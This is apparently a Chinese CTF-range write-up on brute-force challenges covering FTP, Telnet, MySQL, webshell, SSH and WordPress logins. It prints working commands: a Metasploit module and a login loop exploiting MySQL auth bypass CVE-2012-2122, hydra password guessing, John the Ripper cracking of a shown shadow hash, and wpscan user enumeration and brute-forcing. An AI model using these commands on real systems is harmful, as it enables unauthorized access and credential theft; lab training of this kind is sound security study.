安鸾靶场--暴力破解
ftp服务破解
给出了IP,还提供了一个字典文件,直接拿这个字典来爆破就完事儿了(但是这里只提供密码呀,所以得自己找常见用户名字典了)。
使用超级弱口令爆破工具
直接爆破
得到账号密码后,使用浏览器登录ftp服务器
下载flag文件获取flag
Telnet服务破解
使用kali系统自带得hyrad工具,暴力破解telnet账号密码
回到win系统,打开命令窗口
telnet www.whalwl.fun 2323
Mysql暴力破解
初看题目,发现是暴力破解,然后我果断运用了kali的hyrad工具,发现爆破失败。哎,这不是暴力破解吗?于是我又回来仔细看了一下题目,发现题目提示:利用mysql漏洞
上网查了查,发现是Mysql 身份认证绕过漏洞(CVE-2012-2122)
简介:当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值(memcmp函数主要是用来对比字符串的),也会使MySQL认为两个密码是相同的。 也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。按照公告说法大约256次就能够蒙对一次。
这里我 运用两种方法进行漏洞利用。
第一种:打开kali采用msfconsole中的模块进行漏洞验证,然后解hash就可以看到密码,得到密码后,可以利用数据库连接工具进行连接(这里我不做演示)
使用命令:
msfcnsole #进入msf模块
use mysql_authbypass_hashdump #使用漏洞工具模块
show options #查看选项
set RHOSTS 118.190.133.35 #设置目标ip
set RPORT 3308 #设置目标端口
run #执行
第二种方法:利用for循环,不断的向目标发送请求。
for i in `seq 1 1000`; do mysql -uroot -p123456 -h 118.190.133.35 -P3308 ; done
寻找flag
登陆表单破解
下载提供的用户密码,分别爆破用户密码,然后登录即可
一句话密码破解
这里一句话破解是破解网站shell密码,所以得到网址后,我们扫描一下目录,发现存在robots.txt文件,我们打开看一下,发现存在许多文件,我发现/.webconsole.php文件最可疑,我们就从这个开始破解shell密码。这里使用到的工具是K8_FuckOneShell(扫描shell密码)下载地址:K8tools/K8_FuckOneShell_20161224%5BK.8%5D.rar at 78dd750a11258b803c2a0f1a2dcdcbffc1834148 · fan-ch/K8tools · GitHub然后我们下载靶场提供的字典,把字典粘贴到K8_FuckOneShell同文件目录下。
得到密码后,我们用菜刀连接一下看看,在根目录找到flag
SSH离线破解
我们利用john工具进行破解。
john工具介绍:John the Ripper是一个流行的口令破解工具,它支持Windows和Linux平台,是一个开源软件。
常用命令:
john --wordlist=./dict.txt ./shadow -->指定字典dict.txt爆破shadow文件。
john ./shadow -->不指定字典,直接拿john提供的字典来爆破shadow文件。
john --show ./shadow -->查上次爆破结果,在shadow文件中。
/etc/shadow 文件,用于存储 Linux 系统中用户的密码信息,又称为“影子文件”,并且只有 root 用户拥有读权限,其他用户是没有任何权限的。
我们使用root用户查看一下shadow文件
shadow文件中每行代表一个用户,同样使用 ":" 作为分隔符,不同之处在于,每行用户信息被划分为 9 个字段。每个字段的含义如下:
用户名:加密密码:最后一次修改时间:最小修改时间间隔:密码有效期:密码需要变更前的警告天数:密码过期后的宽限时间:账号失效时间:保留字段
具体shadow文件解析请看:Linux /etc/shadow(影子文件)内容解析(超详细)
我们下载靶场提供的字典,分析shadow文件,test是用户名,从$6$看出他是通过SHA-512来进行加密的
test:$6$Vt6D0jvyawaHX1mT$7mD9IvHMBm3jhaEv5H5euXSeqEx1s1TzRCfe7FxMcDU5w2HFpvpUloseOSawFWg81oqp4qU2EWUMGuDNSFZeu.:18833:0:99999:7:::
然后我们使用命令破解(自行百度安装john工具)
第一步破解密码
john --w:john_dict.txt --format=sha512crypt shadow
--w:表示字典文件
--fromat:表示预定义密码破解的类型 DES/BSDI/MD5/BF/AFS/LM/
sha512crypt:表示SHA512散列的密码,用于解密
第二步查找密码
备注:破解过的用户的密码保存在/home文件夹下的隐藏文件./john/john.pot里cat /home/kali/.john/john.pot
使用kali连接服务器,发现连接不成功,不知道为啥。
然后换finalshell或者xshell登录。
使用命令find / "*this_is_flag*" 查找flag,使用命令cat /this_is_flag
john是离线爆破,
我们也可以使用hydra在线爆破,我们只需密码字典够大就可以爆破(题目提示我们不能在线爆破,服务器抗不住,但是我们可以把线程调到最小嘛)
hydra命令:
hydra -l test -P ./pass.txt ssh://118.190.133.35:22000
wordpress后台破解
尝试用burp爆破,发现爆破一段时间后状态马变成500了,说明使用burp爆破行不通。
于是我们使用工具wpscan来进行破解。
wpscan工具简介:
WPScan是Kali Linux默认自带的一款漏洞扫描工具,它采用Ruby编写,能够扫描WordPress网站中的多种安全漏洞,其中包括WordPress本身的漏洞、插件漏洞和主题漏洞。
常见用法:
wpscan --update #更新到最新版本
wpscan --url http://xxxx.com #扫描网站
wpscan --url http://xxxx.com --enumerate -u #枚举wordpress用户名
#--enumerate | -e [option(s)] 枚举
u 枚举用户名,默认从1-10
u[10-20] 枚举用户名,配置从10-20
p 枚举插件
vp 只枚举有漏洞的插件
ap 枚举所有插件,时间较长
tt 列举缩略图相关的文件
t 枚举主题信息
vt 只枚举存在漏洞的主题
wpscan --url http://xxxx.com --username '用户名' -P 字典.txt #已知用户名,使用字典爆破密码
wpscan --url http://xxxx.com -P password.txt -U username.txt #同时爆破用户名及密码
拿着账号密码去登录即可拿到flag。
安鸾靶场--暴力破解相关推荐
- Pikachu靶场-暴力破解
1.暴力破解 1.Burte Force(暴力破解)概述 Burte Force(暴力破解)概述 "暴力破解"是一攻击具手段,在web攻击中,一般会使用这种手段对应用系统的认证信息 ...
- Pikachu靶场暴力破解通关
目录 字典获取 BP四种攻击模式 一.Sniper(狙击手模式) 二.Battering ram(攻城锤模式) 三.Pitchfork(叉子模式) 四.Cluster bomb(炸弹模式) 靶场练习 ...
- pikachu靶场暴力破解专题
一.前言 pikachu是我作为初探渗透的平台,所以我会在每个专题前增加更多的基础知识,一是方便自己巩固基础,二是帮助一些也打算入门渗透的小白更好的理解. 二.暴力破解 pikachu靶场里给出的暴 ...
- pikachu靶场 暴力破解
目录 基于表单的暴力破解 验证码绕过(on server) 验证码绕过(on client) token防爆破? 基于表单的暴力破解 这一关没有防护,直接开始攻击过程 开启抓包,输入用户名admin, ...
- Pikachu靶场暴力破解关卡3
这是暴力破解关卡的第三关on client 正常做题思路 首先输入username,按提交看页面的显示 提示请输入验证码 接着输入password继续点击登录 又是请输入验证码 接着输入错误的验证码看 ...
- 安鸾靶场之XSS漏洞_交友平台
本次实验的环境由安鸾渗透实战平台搭建 目标是渗透进网站拿到flag 提示flag在服务器根目录 出于学习目的,由于本人也是小白,错误的地方望指点 参考链接:MD5截断比较验证 - Ye'sBlog - ...
- 安鸾靶场-LFI本地文件包含 LFI本地文件包含LF2 文件包含漏洞练习记录
记得几个月刚接触CTF就遇到了一个文件包含漏洞题目 i春秋 afr1 解题过程 题解 原理 PHP伪协议 文件包含漏洞_AAAAAAAAAAAA66的博客-CSDN博客 记得当时的想法就是既然啥也不会 ...
- pikachu靶场通关之暴力破解
暴力破解 攻击者在不知道目标系统的账号密码的情况下,一种对目标系统尝试性的登录 连续性尝试+字典=自动化 字典 一个有效的字典,可以大大提高暴力破解的效率 字典会在下篇文章分享 如果一个网站没有对登录 ...
- 一次真实的应急响应案例(Linux)——SSH暴力破解+crontab隐藏后门——事件复现(含靶场环境)
一.SSH协议介绍 SSH(Secure Shell)是一套协议标准,可以用来实现两台机器之间的安全登录以及安全的数据传送,其保证数据安全的原理是非对称加密.SSH 是目前较可靠,专为远程登录会话和其 ...
- WEB安全实战(带靶场)–暴力破解
WEB安全实战(带靶场)–暴力破解 靶场一:DVWA中的暴力破解 靶场二:靶场实验 暴力破解 暴力破解百度云链接(失效请在评论区通知) 链接:https://pan.baidu.com/s/1FcNF ...
最新文章
- mysql中begin end中变量定义_DECLARE只能用于BEGIN…END的开头部分定义局部变量,其作用范围只能在该BEGIN…END中。_学小易找答案...
- 计算机系统数据保存期限,官方数据:U盘数据通常可以保存多长时间
- linux php ftp扩展,Linux中如何安装 PHP 扩展?(方法介绍)
- java jolt调用tuxedo_Jolt调用Tuxedo服务,该怎么处理
- win7 下配置 Qt5.1 for Android
- set的用法及短语_人教版九全Unit 14重点短语、重点句型、课文讲解
- 使用光标查询10部门的员工姓名和工资,并打印__使用光标查询员工姓名和工资,并打印
- c++中多线程传递参数原理分析
- 关于配置环境变量相关解答
- 【实习之T100开发】T100 单档程序开发(1)开发流程
- python画十字_matplotlib绘制鼠标的十字光标的实现(内置方式)
- CentOS 6.5静态IP的设置(NAT和桥接联网方式都适用)
- 十天学会单片机(2)点亮一个发光管
- html里的底部c怎么打出来,版权所属符号-网站底部版权符号怎么打出来
- ARM Cortex M3处理器概述
- 云效首发应用交付和项目协作新品,助力企业DevOps到BizDevOps
- 【JavaScript 逆向】极验四代无感验证码逆向分析
- Android Camera相机开发示例、Android 开发板 USB摄像头采集、定期拍照、定时拍照,安卓调用摄像头拍照、Android摄像头预览、监控,USB摄像头开发、摄像头监控代码
- MySQL数据库字符串(单行)函数#concat、length、tirm、replace、strcmp、substr等函数总结
- [Linux]常见环境开发工具
热门文章
- 中国宽带可调谐飞秒激光器行业市场供需与战略研究报告
- FPGA、MCU(stm3251)驱动VGA显示器_电阻分压法硬件设计_VGA电阻网络分压
- 计算机协会取消信息学奥赛,15万人参加的信息学奥赛停了 学生咋办家长咋看?...
- 如何在Ubuntu18.4中设置ERPNEXT开源ERP生产环境开机运行
- python解决八数码问题_python八数码
- 合同管理系统操作手册
- MySQL的索引与事务(面试必考) - 细节狂魔
- 健康知识api根据健康知识ID查询详细信息
- Golang 协程 跟Java NIO
- C#使用SHA1加密类(RSAFromPkcs8)支持1024位和2048位私钥